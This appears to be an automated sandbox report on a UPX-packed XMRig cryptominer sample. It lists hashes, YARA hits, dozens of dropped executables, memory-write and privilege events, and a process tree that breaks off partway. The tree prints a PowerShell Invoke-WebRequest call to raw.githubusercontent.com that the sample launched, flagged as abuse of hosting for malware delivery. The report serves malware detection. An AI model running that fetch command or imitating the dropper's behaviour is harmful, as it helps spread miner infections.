xmrig | 6c3d8bb6021438142f4f4c7c1c1f508fbf0eab9b3c82ba193c558822045c4247

Analysis

max time kernel
93s
max time network
94s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
29/04/2024, 01:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe
Size

2.2MB
MD5

068c18d6e80523f6663d2e8282e54dfb
SHA1

72d8c3627bd6ad4af38384cd9d2fee9818f139b8
SHA256

6c3d8bb6021438142f4f4c7c1c1f508fbf0eab9b3c82ba193c558822045c4247
SHA512

64247f8a9faf53ce41a6d33168694f6f0e88743fe2b38a866fa8a56c7ff50697a9a085145fbdbc700774ca5a7fef74fe90e2de6465b161a0abcee9e3fe1861c3
SSDEEP

49152:Lz071uv4BPMkibTIA5sf6r+WVc2HhG82g1VQx7Va4qrf4:NABH

Score

10^/10

xmrig miner upx

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 42 IoCs

miner

resource	yara_rule
behavioral2/memory/3100-50-0x00007FF7A3560000-0x00007FF7A3952000-memory.dmp	xmrig
behavioral2/memory/1136-56-0x00007FF7A0620000-0x00007FF7A0A12000-memory.dmp	xmrig
behavioral2/memory/4020-328-0x00007FF7A5F90000-0x00007FF7A6382000-memory.dmp	xmrig
behavioral2/memory/4600-335-0x00007FF6A4AE0000-0x00007FF6A4ED2000-memory.dmp	xmrig
behavioral2/memory/4780-332-0x00007FF7517E0000-0x00007FF751BD2000-memory.dmp	xmrig
behavioral2/memory/1760-356-0x00007FF6425B0000-0x00007FF6429A2000-memory.dmp	xmrig
behavioral2/memory/5080-374-0x00007FF6B8C70000-0x00007FF6B9062000-memory.dmp	xmrig
behavioral2/memory/692-379-0x00007FF7E3760000-0x00007FF7E3B52000-memory.dmp	xmrig
behavioral2/memory/768-381-0x00007FF687D40000-0x00007FF688132000-memory.dmp	xmrig
behavioral2/memory/5036-380-0x00007FF650740000-0x00007FF650B32000-memory.dmp	xmrig
behavioral2/memory/2352-378-0x00007FF6D4300000-0x00007FF6D46F2000-memory.dmp	xmrig
behavioral2/memory/4704-367-0x00007FF7AD7A0000-0x00007FF7ADB92000-memory.dmp	xmrig
behavioral2/memory/892-366-0x00007FF7C8450000-0x00007FF7C8842000-memory.dmp	xmrig
behavioral2/memory/3524-359-0x00007FF7D5990000-0x00007FF7D5D82000-memory.dmp	xmrig
behavioral2/memory/4192-358-0x00007FF7FC440000-0x00007FF7FC832000-memory.dmp	xmrig
behavioral2/memory/4184-355-0x00007FF6CB050000-0x00007FF6CB442000-memory.dmp	xmrig
behavioral2/memory/2088-354-0x00007FF6D6000000-0x00007FF6D63F2000-memory.dmp	xmrig
behavioral2/memory/2112-350-0x00007FF745560000-0x00007FF745952000-memory.dmp	xmrig
behavioral2/memory/3760-326-0x00007FF6AE970000-0x00007FF6AED62000-memory.dmp	xmrig
behavioral2/memory/1440-48-0x00007FF6E5AA0000-0x00007FF6E5E92000-memory.dmp	xmrig
behavioral2/memory/4112-2029-0x00007FF6616E0000-0x00007FF661AD2000-memory.dmp	xmrig
behavioral2/memory/4112-2059-0x00007FF6616E0000-0x00007FF661AD2000-memory.dmp	xmrig
behavioral2/memory/692-2061-0x00007FF7E3760000-0x00007FF7E3B52000-memory.dmp	xmrig
behavioral2/memory/1440-2063-0x00007FF6E5AA0000-0x00007FF6E5E92000-memory.dmp	xmrig
behavioral2/memory/3100-2065-0x00007FF7A3560000-0x00007FF7A3952000-memory.dmp	xmrig
behavioral2/memory/5036-2067-0x00007FF650740000-0x00007FF650B32000-memory.dmp	xmrig
behavioral2/memory/1136-2071-0x00007FF7A0620000-0x00007FF7A0A12000-memory.dmp	xmrig
behavioral2/memory/4780-2076-0x00007FF7517E0000-0x00007FF751BD2000-memory.dmp	xmrig
behavioral2/memory/4020-2077-0x00007FF7A5F90000-0x00007FF7A6382000-memory.dmp	xmrig
behavioral2/memory/4600-2081-0x00007FF6A4AE0000-0x00007FF6A4ED2000-memory.dmp	xmrig
behavioral2/memory/2112-2080-0x00007FF745560000-0x00007FF745952000-memory.dmp	xmrig
behavioral2/memory/2088-2083-0x00007FF6D6000000-0x00007FF6D63F2000-memory.dmp	xmrig
behavioral2/memory/3760-2070-0x00007FF6AE970000-0x00007FF6AED62000-memory.dmp	xmrig
behavioral2/memory/768-2073-0x00007FF687D40000-0x00007FF688132000-memory.dmp	xmrig
behavioral2/memory/4704-2095-0x00007FF7AD7A0000-0x00007FF7ADB92000-memory.dmp	xmrig
behavioral2/memory/5080-2097-0x00007FF6B8C70000-0x00007FF6B9062000-memory.dmp	xmrig
behavioral2/memory/2352-2099-0x00007FF6D4300000-0x00007FF6D46F2000-memory.dmp	xmrig
behavioral2/memory/4184-2093-0x00007FF6CB050000-0x00007FF6CB442000-memory.dmp	xmrig
behavioral2/memory/4192-2092-0x00007FF7FC440000-0x00007FF7FC832000-memory.dmp	xmrig
behavioral2/memory/1760-2090-0x00007FF6425B0000-0x00007FF6429A2000-memory.dmp	xmrig
behavioral2/memory/3524-2087-0x00007FF7D5990000-0x00007FF7D5D82000-memory.dmp	xmrig
behavioral2/memory/892-2086-0x00007FF7C8450000-0x00007FF7C8842000-memory.dmp	xmrig

Blocklisted process makes network request 2 IoCs

flow	pid	Process
3	2448	powershell.exe
5	2448	powershell.exe

Executes dropped EXE 64 IoCs

pid	Process
4112	WVJfsDb.exe
692	OkyWVTK.exe
1440	DtcZcba.exe
3100	hgkjecM.exe
1136	SZLGoKo.exe
3760	McyPBMM.exe
5036	lYwRCLx.exe
768	uSwirim.exe
4020	gYDJGQd.exe
4780	ckiWpAR.exe
4600	XpzdAYv.exe
2112	DjsEeZs.exe
2088	ijrZPLa.exe
4184	FrlYcVh.exe
1760	dikKSyH.exe
4192	ZDesfCu.exe
3524	rtQRufw.exe
892	YwFUGcb.exe
4704	wpMypOK.exe
5080	GNjMawj.exe
2352	CHORNAi.exe
976	vlwRTVw.exe
5112	vzesrOL.exe
2060	YtDEXpB.exe
2056	OVPtTXP.exe
4672	woSAzwB.exe
3808	XyPSKCN.exe
2372	TVTYdiq.exe
2632	XByeNXe.exe
896	LWoPqqm.exe
1620	BbJHPdU.exe
3812	KQbCngb.exe
4748	KAGcSZP.exe
436	KeroKBL.exe
4404	gxfkCzI.exe
652	YDIxaxL.exe
4092	MweRrLZ.exe
1848	dYNckDa.exe
4236	gxiLdqg.exe
2708	EpyiUHM.exe
4648	KLDBxLJ.exe
2300	tYiVRHI.exe
2288	WYwpqfG.exe
2508	kgKCjFK.exe
4608	RCYCtbi.exe
1292	XJLyrje.exe
3032	XhamsdT.exe
208	uyrIVSK.exe
1556	lkRzqDd.exe
4464	SZsXADq.exe
2724	cEBresP.exe
5048	EBHshcM.exe
1740	SeCuxPs.exe
4108	TRIzzLb.exe
3828	ZKoZBef.exe
2408	AmSJNfN.exe
2648	IFxeqFL.exe
1564	SGCFPho.exe
936	XNLQDDJ.exe
3896	pHPfHBn.exe
4996	jPvEszY.exe
712	suKUXBp.exe
4520	tHbUXvl.exe
1700	cmhAJTV.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/3884-0-0x00007FF6092D0000-0x00007FF6096C2000-memory.dmp	upx
behavioral2/files/0x0008000000023427-5.dat	upx
behavioral2/memory/4112-8-0x00007FF6616E0000-0x00007FF661AD2000-memory.dmp	upx
behavioral2/files/0x000700000002342b-10.dat	upx
behavioral2/memory/3100-50-0x00007FF7A3560000-0x00007FF7A3952000-memory.dmp	upx
behavioral2/memory/1136-56-0x00007FF7A0620000-0x00007FF7A0A12000-memory.dmp	upx
behavioral2/files/0x0008000000023430-61.dat	upx
behavioral2/files/0x000800000002342f-71.dat	upx
behavioral2/files/0x0007000000023436-91.dat	upx
behavioral2/files/0x000700000002343d-120.dat	upx
behavioral2/files/0x000700000002343f-138.dat	upx
behavioral2/files/0x0007000000023441-148.dat	upx
behavioral2/files/0x0007000000023443-158.dat	upx
behavioral2/memory/4020-328-0x00007FF7A5F90000-0x00007FF7A6382000-memory.dmp	upx
behavioral2/memory/4600-335-0x00007FF6A4AE0000-0x00007FF6A4ED2000-memory.dmp	upx
behavioral2/memory/4780-332-0x00007FF7517E0000-0x00007FF751BD2000-memory.dmp	upx
behavioral2/memory/1760-356-0x00007FF6425B0000-0x00007FF6429A2000-memory.dmp	upx
behavioral2/memory/5080-374-0x00007FF6B8C70000-0x00007FF6B9062000-memory.dmp	upx
behavioral2/memory/692-379-0x00007FF7E3760000-0x00007FF7E3B52000-memory.dmp	upx
behavioral2/memory/768-381-0x00007FF687D40000-0x00007FF688132000-memory.dmp	upx
behavioral2/memory/5036-380-0x00007FF650740000-0x00007FF650B32000-memory.dmp	upx
behavioral2/memory/2352-378-0x00007FF6D4300000-0x00007FF6D46F2000-memory.dmp	upx
behavioral2/memory/4704-367-0x00007FF7AD7A0000-0x00007FF7ADB92000-memory.dmp	upx
behavioral2/memory/892-366-0x00007FF7C8450000-0x00007FF7C8842000-memory.dmp	upx
behavioral2/memory/3524-359-0x00007FF7D5990000-0x00007FF7D5D82000-memory.dmp	upx
behavioral2/memory/4192-358-0x00007FF7FC440000-0x00007FF7FC832000-memory.dmp	upx
behavioral2/memory/4184-355-0x00007FF6CB050000-0x00007FF6CB442000-memory.dmp	upx
behavioral2/memory/2088-354-0x00007FF6D6000000-0x00007FF6D63F2000-memory.dmp	upx
behavioral2/memory/2112-350-0x00007FF745560000-0x00007FF745952000-memory.dmp	upx
behavioral2/memory/3760-326-0x00007FF6AE970000-0x00007FF6AED62000-memory.dmp	upx
behavioral2/files/0x0007000000023449-180.dat	upx
behavioral2/files/0x0007000000023447-178.dat	upx
behavioral2/files/0x0007000000023448-175.dat	upx
behavioral2/files/0x0007000000023446-173.dat	upx
behavioral2/files/0x0007000000023445-168.dat	upx
behavioral2/files/0x0007000000023444-163.dat	upx
behavioral2/files/0x0007000000023442-153.dat	upx
behavioral2/files/0x0007000000023440-143.dat	upx
behavioral2/files/0x000700000002343e-133.dat	upx
behavioral2/files/0x000700000002343c-123.dat	upx
behavioral2/files/0x000700000002343b-118.dat	upx
behavioral2/files/0x000700000002343a-111.dat	upx
behavioral2/files/0x0007000000023439-106.dat	upx
behavioral2/files/0x0007000000023438-101.dat	upx
behavioral2/files/0x0007000000023437-96.dat	upx
behavioral2/files/0x0007000000023435-86.dat	upx
behavioral2/files/0x0007000000023434-81.dat	upx
behavioral2/files/0x0007000000023433-76.dat	upx
behavioral2/files/0x0007000000023432-66.dat	upx
behavioral2/files/0x000700000002342e-51.dat	upx
behavioral2/files/0x0007000000023431-49.dat	upx
behavioral2/memory/1440-48-0x00007FF6E5AA0000-0x00007FF6E5E92000-memory.dmp	upx
behavioral2/files/0x000700000002342d-45.dat	upx
behavioral2/files/0x000700000002342c-38.dat	upx
behavioral2/files/0x000800000002342a-12.dat	upx
behavioral2/memory/4112-2029-0x00007FF6616E0000-0x00007FF661AD2000-memory.dmp	upx
behavioral2/memory/4112-2059-0x00007FF6616E0000-0x00007FF661AD2000-memory.dmp	upx
behavioral2/memory/692-2061-0x00007FF7E3760000-0x00007FF7E3B52000-memory.dmp	upx
behavioral2/memory/1440-2063-0x00007FF6E5AA0000-0x00007FF6E5E92000-memory.dmp	upx
behavioral2/memory/3100-2065-0x00007FF7A3560000-0x00007FF7A3952000-memory.dmp	upx
behavioral2/memory/5036-2067-0x00007FF650740000-0x00007FF650B32000-memory.dmp	upx
behavioral2/memory/1136-2071-0x00007FF7A0620000-0x00007FF7A0A12000-memory.dmp	upx
behavioral2/memory/4780-2076-0x00007FF7517E0000-0x00007FF751BD2000-memory.dmp	upx
behavioral2/memory/4020-2077-0x00007FF7A5F90000-0x00007FF7A6382000-memory.dmp	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
2	raw.githubusercontent.com
3	raw.githubusercontent.com

Drops file in Windows directory 64 IoCs

description	ioc	Process
File created	C:\Windows\System\OQmOsYT.exe	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe
File created	C:\Windows\System\GBJUKok.exe	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe
File created	C:\Windows\System\wRetGaU.exe	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe
File created	C:\Windows\System\BZJEQYf.exe	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe
File created	C:\Windows\System\DDhlvgR.exe	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe
File created	C:\Windows\System\pYhHAEk.exe	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe
File created	C:\Windows\System\cqtPlhl.exe	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe
File created	C:\Windows\System\OIbSQNS.exe	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe
File created	C:\Windows\System\kWpFanz.exe	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe
File created	C:\Windows\System\AkblQSF.exe	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe
File created	C:\Windows\System\ZAHMpsK.exe	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe
File created	C:\Windows\System\UBCGpys.exe	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe
File created	C:\Windows\System\ypkcqgR.exe	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe
File created	C:\Windows\System\RvmjcHR.exe	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe
File created	C:\Windows\System\AdzcynD.exe	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe
File created	C:\Windows\System\IBijHYU.exe	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe
File created	C:\Windows\System\OawTOok.exe	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe
File created	C:\Windows\System\qSBfJTi.exe	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe
File created	C:\Windows\System\NAjifwl.exe	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe
File created	C:\Windows\System\kbugppI.exe	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe
File created	C:\Windows\System\XJLyrje.exe	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe
File created	C:\Windows\System\suKUXBp.exe	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe
File created	C:\Windows\System\xQGyxCv.exe	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe
File created	C:\Windows\System\RoTfikv.exe	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe
File created	C:\Windows\System\WnvPkkf.exe	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe
File created	C:\Windows\System\yXuiDyt.exe	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe
File created	C:\Windows\System\ZWddXgq.exe	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe
File created	C:\Windows\System\ckiWpAR.exe	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe
File created	C:\Windows\System\GWzilZv.exe	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe
File created	C:\Windows\System\eyDvDaO.exe	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe
File created	C:\Windows\System\pvxHtok.exe	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe
File created	C:\Windows\System\wVwgESu.exe	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe
File created	C:\Windows\System\hlNuhnZ.exe	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe
File created	C:\Windows\System\hXzRTFr.exe	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe
File created	C:\Windows\System\mYgxXCB.exe	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe
File created	C:\Windows\System\XPHsXmX.exe	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe
File created	C:\Windows\System\HhVLDcp.exe	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe
File created	C:\Windows\System\RpiqDpU.exe	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe
File created	C:\Windows\System\tPWzXFf.exe	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe
File created	C:\Windows\System\rAmEWNp.exe	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe
File created	C:\Windows\System\GNjMawj.exe	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe
File created	C:\Windows\System\tHbUXvl.exe	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe
File created	C:\Windows\System\zYVHuer.exe	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe
File created	C:\Windows\System\FHoQIhY.exe	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe
File created	C:\Windows\System\sjsrItD.exe	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe
File created	C:\Windows\System\SAEDkLL.exe	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe
File created	C:\Windows\System\dikKSyH.exe	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe
File created	C:\Windows\System\XyPSKCN.exe	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe
File created	C:\Windows\System\JtSBIrM.exe	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe
File created	C:\Windows\System\GzpTVPP.exe	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe
File created	C:\Windows\System\DmEPEEp.exe	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe
File created	C:\Windows\System\XpzdAYv.exe	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe
File created	C:\Windows\System\YBDekDA.exe	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe
File created	C:\Windows\System\AuspArP.exe	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe
File created	C:\Windows\System\wvrIiLD.exe	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe
File created	C:\Windows\System\ERABIeG.exe	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe
File created	C:\Windows\System\uBIuOmJ.exe	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe
File created	C:\Windows\System\QNJxIEO.exe	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe
File created	C:\Windows\System\MUFPTXb.exe	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe
File created	C:\Windows\System\fNugqwt.exe	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe
File created	C:\Windows\System\WmGWinQ.exe	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe
File created	C:\Windows\System\tLCvNVY.exe	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe
File created	C:\Windows\System\XByeNXe.exe	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe
File created	C:\Windows\System\mKqokuY.exe	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wermgr.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	wermgr.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2448	powershell.exe
2448	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeLockMemoryPrivilege	3884	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe
Token: SeLockMemoryPrivilege	3884	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe
Token: SeDebugPrivilege	2448	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3884 wrote to memory of 2448	3884	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe	83
PID 3884 wrote to memory of 2448	3884	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe	83
PID 3884 wrote to memory of 4112	3884	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe	84
PID 3884 wrote to memory of 4112	3884	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe	84
PID 3884 wrote to memory of 692	3884	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe	85
PID 3884 wrote to memory of 692	3884	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe	85
PID 3884 wrote to memory of 1440	3884	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe	86
PID 3884 wrote to memory of 1440	3884	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe	86
PID 3884 wrote to memory of 3100	3884	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe	87
PID 3884 wrote to memory of 3100	3884	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe	87
PID 3884 wrote to memory of 1136	3884	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe	88
PID 3884 wrote to memory of 1136	3884	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe	88
PID 3884 wrote to memory of 3760	3884	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe	89
PID 3884 wrote to memory of 3760	3884	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe	89
PID 3884 wrote to memory of 5036	3884	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe	90
PID 3884 wrote to memory of 5036	3884	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe	90
PID 3884 wrote to memory of 768	3884	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe	91
PID 3884 wrote to memory of 768	3884	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe	91
PID 3884 wrote to memory of 4020	3884	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe	92
PID 3884 wrote to memory of 4020	3884	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe	92
PID 3884 wrote to memory of 4780	3884	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe	93
PID 3884 wrote to memory of 4780	3884	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe	93
PID 3884 wrote to memory of 4600	3884	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe	94
PID 3884 wrote to memory of 4600	3884	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe	94
PID 3884 wrote to memory of 2112	3884	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe	95
PID 3884 wrote to memory of 2112	3884	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe	95
PID 3884 wrote to memory of 2088	3884	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe	96
PID 3884 wrote to memory of 2088	3884	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe	96
PID 3884 wrote to memory of 4184	3884	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe	97
PID 3884 wrote to memory of 4184	3884	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe	97
PID 3884 wrote to memory of 1760	3884	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe	98
PID 3884 wrote to memory of 1760	3884	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe	98
PID 3884 wrote to memory of 4192	3884	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe	99
PID 3884 wrote to memory of 4192	3884	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe	99
PID 3884 wrote to memory of 3524	3884	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe	100
PID 3884 wrote to memory of 3524	3884	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe	100
PID 3884 wrote to memory of 892	3884	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe	101
PID 3884 wrote to memory of 892	3884	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe	101
PID 3884 wrote to memory of 4704	3884	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe	102
PID 3884 wrote to memory of 4704	3884	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe	102
PID 3884 wrote to memory of 5080	3884	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe	103
PID 3884 wrote to memory of 5080	3884	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe	103
PID 3884 wrote to memory of 2352	3884	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe	104
PID 3884 wrote to memory of 2352	3884	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe	104
PID 3884 wrote to memory of 976	3884	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe	105
PID 3884 wrote to memory of 976	3884	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe	105
PID 3884 wrote to memory of 5112	3884	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe	106
PID 3884 wrote to memory of 5112	3884	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe	106
PID 3884 wrote to memory of 2060	3884	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe	107
PID 3884 wrote to memory of 2060	3884	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe	107
PID 3884 wrote to memory of 2056	3884	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe	108
PID 3884 wrote to memory of 2056	3884	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe	108
PID 3884 wrote to memory of 4672	3884	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe	109
PID 3884 wrote to memory of 4672	3884	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe	109
PID 3884 wrote to memory of 3808	3884	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe	110
PID 3884 wrote to memory of 3808	3884	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe	110
PID 3884 wrote to memory of 2372	3884	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe	111
PID 3884 wrote to memory of 2372	3884	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe	111
PID 3884 wrote to memory of 2632	3884	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe	112
PID 3884 wrote to memory of 2632	3884	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe	112
PID 3884 wrote to memory of 896	3884	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe	113
PID 3884 wrote to memory of 896	3884	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe	113
PID 3884 wrote to memory of 1620	3884	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe	114
PID 3884 wrote to memory of 1620	3884	068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe	114

C:\Users\Admin\AppData\Local\Temp\068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\068c18d6e80523f6663d2e8282e54dfb_JaffaCakes118.exe"
1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3884
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2448
- - C:\Windows\system32\wermgr.exe
    "C:\Windows\system32\wermgr.exe" "-outproc" "0" "2448" "2960" "2892" "2964" "0" "0" "2968" "0" "0" "0" "0" "0"
    3⤵
    - Checks processor information in registry
    - Enumerates system info in registry
    PID:4260
- C:\Windows\System\WVJfsDb.exe
  C:\Windows\System\WVJfsDb.exe
  2⤵
  - Executes dropped EXE
  PID:4112
- C:\Windows\System\OkyWVTK.exe
  C:\Windows\System\OkyWVTK.exe
  2⤵
  - Executes dropped EXE
  PID:692
- C:\Windows\System\DtcZcba.exe
  C:\Windows\System\DtcZcba.exe
  2⤵
  - Executes dropped EXE
  PID:1440
- C:\Windows\System\hgkjecM.exe
  C:\Windows\System\hgkjecM.exe
  2⤵
  - Executes dropped EXE
  PID:3100
- C:\Windows\System\SZLGoKo.exe
  C:\Windows\System\SZLGoKo.exe
  2⤵
  - Executes dropped EXE
  PID:1136
- C:\Windows\System\McyPBMM.exe
  C:\Windows\System\McyPBMM.exe
  2⤵
  - Executes dropped EXE
  PID:3760
- C:\Windows\System\lYwRCLx.exe
  C:\Windows\System\lYwRCLx.exe
  2⤵
  - Executes dropped EXE
  PID:5036
- C:\Windows\System\uSwirim.exe
  C:\Windows\System\uSwirim.exe
  2⤵
  - Executes dropped EXE
  PID:768
- C:\Windows\System\gYDJGQd.exe
